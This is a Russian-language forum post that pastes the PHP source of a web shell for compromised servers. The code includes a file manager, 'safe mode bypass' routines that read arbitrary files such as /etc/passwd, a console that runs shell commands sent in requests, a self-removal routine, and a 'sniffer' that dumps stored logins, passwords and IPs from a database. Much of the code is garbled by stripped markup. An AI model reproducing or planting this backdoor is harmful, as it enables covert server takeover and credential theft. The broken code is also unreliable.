|
Guest
Сообщений: n/a
Провел на форуме:
1059
Репутация:
0
|
|
?>
function sa() {
for(i=0;i
NameSizeModifyOwner/GroupPermissionsActions";
$dirs = $files = $links = array();
$n = count($dirContent);
for($i=0;$i $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$links[] = array_merge($tmp, array('type' => 'link'));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] '.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms']
.'R T'.(($f['type']=='file')?' E D':'').'';
$l = $l?0:1;
}
?>
'>
'>
CopyMoveDeletePaste >">
String conversions';
$stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "";
foreach($stringTools as $k => $v)
echo "".$k."";
echo ">'/> send using AJAX
".htmlspecialchars(@$_POST['p2'])."";
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"";
?>
Search for hash:
File tools';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'
';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';
echo '
';
switch($_POST['p2']) {
case 'view':
echo '';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array(''), array(''),$code).'';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!
document.mf.p3.value="";';
else
die('g(null,null,null,null,"")');
}
echo '>">';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
@file_put_contents($_POST['p1'],$_POST['p3']);
echo 'Saved!
document.mf.p3.value="";';
}
echo '';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '>">';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000
','','');
$len = strlen($c);
for ($i=0; $i'.$h[0].''.$h[1].''.htmlspecialchars($h[2]).'';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!
document.mf.p3.value="";';
else
die('g(null,null,"'.urlencode($_POST['p3']).'",null,"")');
}
echo '>">';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('g(null,null,null,null,"")');
else {
echo 'Fail!document.mf.p3.value="";';
}
} else echo 'Bad time format!document.mf.p3.value="";';
}
echo '>">';
break;
case 'mkfile':
break;
}
echo '';
printFooter();
}
function actionSafeMode() {
$temp='';
ob_start();
switch($_POST['p1']) {
case 1:
$temp=@tempnam($test, 'cx');
if(@copy("compress.zlib://".$_POST['p2'], $temp)){
echo @file_get_contents($temp);
unlink($temp);
} else
echo 'Sorry... Can\'t open file';
break;
case 2:
$files = glob($_POST['p2'].'*');
if( is_array($files) )
foreach ($files as $filename)
echo $filename."\n";
break;
case 3:
$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] Safe mode bypass';
echo 'Copy (read file)>">
Glob (list dir)>">
Curl (read file)>">
Ini_restore (read file)>">
Posix_getpwuid ("Read" /etc/passwd)FromTo>">
Imap_open (read file)>">';
if($temp)
echo ''.$temp.'';
echo '';
printFooter();
}
function actionConsole() {
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
echo "document.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='".$GLOBALS['cwd']."';";
}
}
echo "document.cf.output.value+='".$temp."';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
?>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur
Console';
foreach($GLOBALS['aliases'] as $n => $v) {
if($v == '') {
echo '';
continue;
}
echo ''.$n.'';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '>"> send using AJAX
';
if(!empty($_POST['p1'])) {
echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
}
echo '';
echo 'document.cf.cmd.focus();';
printFooter();
}
function actionLogout() {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo 'bye!';
}
function actionSelfRemove() {
printHeader();
if($_POST['p1'] == 'yes') {
if(@unlink(SELF_PATH))
die('Shell has been removed');
else
echo 'unlink error!';
}
echo 'SuicideReally want to remove the shell?
Yes';
printFooter();
}
function actionSniffer() {
printHeader();
echo 'Sniffer';
$host='сдесь номер заказа.mysql.ihc.ru';
$db='сама база_db';
$user='сдесь прописан пользователь_db';
$passwd='ну и пароль';
$link = mysql_connect($host, $user, $passwd);
mysql_select_db($db, $link);
$result=mysql_query("SELECT * FROM jos_phocadownload_templates");
$n=mysql_num_rows($result);
echo "";
for($i=0;$i".' Login:',mysql_result($result,$ i,login),"".'Pass:',mysql_result($result,$i,pass), "".'IP:',mysql_result($result,$i,ip),"".'Date:',my sql_result($result,$i,date),"".'id:',mysql_result( $result,$i,id),"".'referer:',mysql_result($result, $i,ref),"";
echo "";
echo "";
mysql_close($link);
printFooter();
}[/I][/I]
|